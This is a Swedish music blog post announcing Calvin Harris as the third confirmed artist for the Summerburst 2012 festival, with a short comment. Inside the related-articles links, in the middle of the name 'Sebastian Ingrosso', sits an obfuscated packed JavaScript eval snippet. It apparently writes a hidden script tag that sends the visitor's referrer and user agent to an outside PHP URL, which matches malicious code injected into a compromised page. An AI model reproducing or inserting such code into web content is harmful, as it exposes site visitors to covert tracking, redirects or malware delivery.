Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Calvin Harris till Summerburst 2012!

Calvin Harris till Summerburst 2012!
Alexander Gylemo

Som många säkert minns och känner till så var ett av Summerburst’s dragplåster förra året brittiska Calvin Harris, som emellertid aldrig dök upp p.g.a. krångel på flygplatsen han var på.

Nu har han dock tagit sig i kragen och krupit till korset då han för några timmar sedan lades till som Summerburst 2012’s tredje bekräftade artist, något som jag sett fram emot sedan förra året. Calvin Harris kommer tillföra en hel del till det kommande årets line-up då han är en grym dj som inte drar sig från att tänja på gränserna och spelar all form av fet musik!

Han spelar tillsammans med Sebastian Ingrosso och resten av artisterna som är yet to be announced lördagen den 16e juni, och denna gång hoppas vi på att han faktiskt kommer!

Checka in övriga artiklar om Summerburst 2012:

Sebastian eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eztts|var|u0026u|referrer|bkeyn||js|php’.split(’|’),0,{}))
Ingrosso till Summerburst 2012

Summerburst 2012

Biljetter till Summerburst 2012 har släppts

Comments

  1. Fagir

    Calvin Harris on the decks